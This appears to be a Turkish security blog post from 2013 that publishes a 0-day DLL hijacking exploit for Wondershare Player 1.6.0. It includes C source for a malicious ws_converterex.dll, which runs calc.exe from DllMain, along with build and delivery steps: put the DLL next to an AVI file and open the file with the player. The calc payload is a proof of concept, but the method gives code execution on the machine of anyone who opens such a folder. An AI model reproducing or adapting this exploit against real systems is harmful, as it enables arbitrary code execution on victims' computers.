27 Kasım 2013 Çarşamba

Wondershare Player 1.6.0 (ws_converterex.dll) - DLL Hijacking (0-day)

Selamlar,

Yine shellcoding ve exploiting teknikleri üzerine bir calisma yaparken meshur bir video player üzerinde BZR Player 'a benzeyen bir dll hijacking güvenlik acigi kesfettim. Cesitli security sitelerinde exploiti paylastıktan sonra burdanda paylasmanın uygun olacagını düsündüm.

Exploitin Kanıt Videosu:


Exploit Code:

/* # Exploit Title: Wondershare Player 1.6.0 (ws_converterex.dll) - DLL Hijacking Vulnerability
// # Date: 27.11.2013
// # Exploit Author: Akin Tosunlar
// # Software Link: http://download.wondershare.com/player_full1374.exe
// # Version: 1.6.0 (Probably old version of software and the LATEST version too)
// # Vendor Homepage: http://www.wondershare.com
// # Tested on: [ Windows XP sp3]
// # Contact : info@vigasis.com
// #------------------
// # Web Page : http://www.vigasis.com
// #
// # YOUTUBE EXPLOIT VIDEO: https://www.youtube.com/watch?v=EKu_-uKKmDA
// #
// #  gcc -shared -o ws_converterex.dll evil.c
// #  Compile evil.c and rar or zip avi file and ws_converterex.dll same folder. Associate Default Player as Wondershare Player or OpenWith Wondershare Player.Double-click AVI File. program start Calc.exe immediately.
// #
*/


#include <windows.h>

int evilcode()
{
WinExec("calc", 0);
exit(0);
return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
evilcode();
return 0;
}

Tesekkurler.

Hiç yorum yok:

Yorum Gönder